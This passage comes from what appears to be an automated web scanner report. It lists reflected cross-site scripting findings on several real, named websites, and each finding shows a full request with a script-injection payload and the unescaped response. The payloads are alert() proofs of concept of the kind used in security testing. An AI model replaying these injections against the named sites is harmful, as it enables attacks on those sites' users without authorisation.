HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
Date: Thu, 03 Feb 2011 21:45:01 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=b3bd9e1a-f928-4358-bae5-e232f65ed404;Path=/;Expires=Fri, 03-Feb-12 21:45:01 GMT
Set-Cookie: taboola_session_id_veoh=v1_ffd326beb15e99ba266c923fcd06736e_b3bd9e1a-f928-4358-bae5-e232f65ed404_1296769501_1296769501;Path=/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 4183

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54&lt;script&g
...[SNIP]...
<pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
   at java.lang.Enum.valueOf(Enum.java:196)
   at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69)
   at com.taboola.trc.data.TextRelatedContentDataSource.getItemType(
...[SNIP]...

3.77. http://trc.taboolasyndication.com/dispatch/ [list-id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 5b0f1<script>alert(1)</script>7876a2b5e3a was submitted in the list-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
Date: Thu, 03 Feb 2011 21:44:34 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=6b3a89d9-b958-41dd-9e3d-cae259e7686f;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Set-Cookie: taboola_session_id_veoh=v1_ef0ffcfd24d42f1d8f2b50542c8bf625_6b3a89d9-b958-41dd-9e3d-cae259e7686f_1296769474_1296769474;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4111

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 unsupported request id: rbox-blended5b0f1&lt;script&gt;alert(1)&lt;/script&gt;7876a2b5e3a, for
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
   at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336)
   at com.taboola.trc.vhf.viewsHandler.
...[SNIP]...

3.78. http://trc.taboolasyndication.com/dispatch/ [publisher parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 3cb6d<script>alert(1)</script>b0331f67d92 was submitted in the publisher parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh3cb6d<script>alert(1)</script>b0331f67d92&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
Date: Thu, 03 Feb 2011 21:44:27 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: close
Content-Length: 3330

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 Invalid publisher name in recommendation request: veoh3cb6d&lt;script&gt;alert(1)&lt;/script&gt
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:746)
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco
...[SNIP]...

3.79. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bfe"><script>alert(1)</script>18ca5e0718d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?97bfe"><script>alert(1)</script>18ca5e0718d=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15800
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=FDMOGJOBLPHILKAOOAOJGEGF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/Index.asp?97bfe"><script>alert(1)</script>18ca5e0718d=1" rel="nofollow">
...[SNIP]...

3.80. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef9"><script>alert(1)</script>dd38641bfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22?d9ef9"><script>alert(1)</script>dd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11704
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=JDEEKNBBLGAHBJGBEKACDHHM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22&d9ef9"><script>alert(1)</script>dd38641bfde=1" rel="nofollow">
...[SNIP]...

3.81. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The value of REST URL parameter 6 is copied into the name of an HTML tag attribute. The payload 3c056%20a%3dbd8be886654d was submitted in the REST URL parameter 6. This input was echoed as 3c056 a=bd8be886654d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns3c056%20a%3dbd8be886654d=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=IOMOGJOBLGKMEEODHDPJNBFA; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS3C056A=BD8BE886654D="ALER
...[SNIP]...
<area shape="rect" rel="nofollow" alt="italian" href="javascript:crealink('http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22/"ns3c056 a=bd8be886654d="alert(0x0006C1)')" coords="0,0,22,15">
...[SNIP]...

3.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fc8"><script>alert(1)</script>3c5d1bbb05c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?21fc8"><script>alert(1)</script>3c5d1bbb05c=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12152
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=CCMOGJOBOEJLBIDGEPLHOCKP; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22/"ns="alert(0x0006C1)&21fc8"><script>alert(1)</script>3c5d1bbb05c=1" rel="nofollow">
...[SNIP]...

3.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload 55cfe><a>a5947f68df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?55cfe><a>a5947f68df6=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DNLOGJOBDBDLOPJCCANBACKG; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
k('traduction.asp?lang=en&amp;dir=http%3A%2F%2Fwww.bizfind.us%2Fschedaazienda.asp%3Fidregione%3D15|isid%3D182221|ragionesociale%3Dabc-development-inc|idcomune1%3Dchicago%2Fx22%2F"ns%3D"alert(0x0006C1)|55cfe><a>a5947f68df6%3D1')" coords="72,0,95,15">
...[SNIP]...

3.84. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f74ff'><script>alert(1)</script>d34a3b78cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f74ff'><script>alert(1)</script>d34a3b78cab=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b960dd1072a2f3a840f705ff54740c17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b960dd1072a2f3a840f705ff54740c17=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?f74ff'><script>alert(1)</script>d34a3b78cab=1' />
...[SNIP]...

3.85. http://www.butterscotch.com/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 231c0'><script>alert(1)</script>53794fb9664 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=tcv3video231c0'><script>alert(1)</script>53794fb9664 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f0045cb2a5d7807aff4f74328f19c8e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f0045cb2a5d7807aff4f74328f19c8e=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?src=tcv3video231c0'><script>alert(1)</script>53794fb9664' />
...[SNIP]...

3.86. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0b4'><script>alert(1)</script>f96c8436d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1bdc60d8c9f8abf938a1f22889b51782; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1bdc60d8c9f8abf938a1f22889b51782=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c' />
...[SNIP]...

3.87. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c40"><script>alert(1)</script>23d9018f7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5e0345a822ab339bca2c7c84855acc0c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5e0345a822ab339bca2c7c84855acc0c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3" />
...[SNIP]...

3.88. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0c8"-alert(1)-"39e9638a1ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/A-List7f0c8"-alert(1)-"39e9638a1ff HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=8826b85f90e6e25f1b2bd4d9bfec5172; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8826b85f90e6e25f1b2bd4d9bfec5172=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50348

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/A-List7f0c8"-alert(1)-"39e9638a1ff";

</script>
...[SNIP]...

3.89. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be04'><script>alert(1)</script>43f8c6292e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT9be04'><script>alert(1)</script>43f8c6292e2 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ee4acbcf205d38f8c695616e3a019909; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ee4acbcf205d38f8c695616e3a019909=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
